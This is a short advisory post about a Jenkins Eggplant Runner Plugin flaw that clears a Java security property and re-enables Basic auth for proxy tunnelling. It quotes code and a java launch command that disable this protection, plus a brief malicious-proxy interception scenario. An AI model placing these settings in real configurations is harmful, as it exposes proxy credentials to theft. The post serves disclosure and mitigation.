Listen to this Post
The Jenkins Eggplant Runner Plugin, versions 0.0.1.301.v963cffe8ddb and earlier, configures proxy settings by programmatically setting the Java system property `jdk.http.auth.tunneling.disabledSchemes` to an empty string. This specific system property is a security control within the Java Runtime Environment (JRE) designed to disable the use of certain authentication schemes, like Basic Auth, when establishing an HTTP tunnel through a proxy. By resetting this property to an empty value, the plugin inadvertently re-enables these previously disabled, weaker authentication methods. This action effectively negates a critical security mitigation that was originally implemented in the JRE to address CVE-2016-5597, which involved the insecure transmission of proxy credentials. Consequently, if a Jenkins instance with this plugin is configured to use an authenticating proxy, user credentials could be transmitted in a less secure manner, potentially exposing them to interception or theft.
Platform: Jenkins Plugin
Version: <= 0.0.1.301.v963cffe8ddb
Vulnerability : Protection Mechanism Bypass
Severity: Moderate
date: 2024-10-29
Prediction: 2024-12-15
What Undercode Say:
`System.setProperty(“jdk.http.auth.tunneling.disabledSchemes”, “”);`
`java -Djdk.http.auth.tunneling.disabledSchemes=”” -jar jenkins.war`
`String disabledSchemes = System.getProperty(“jdk.http.auth.tunneling.disabledSchemes”);`
How Exploit:
Attacker operates a malicious proxy. User credentials are sent with weak authentication. Credentials are intercepted from the network traffic.
Protection from this CVE
Uninstall the plugin. Isolate Jenkins instance. Monitor for official patch. Use a non-authenticating proxy.
Impact:
Proxy Credential Exposure. Authentication Mechanism Bypass. Information Disclosure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
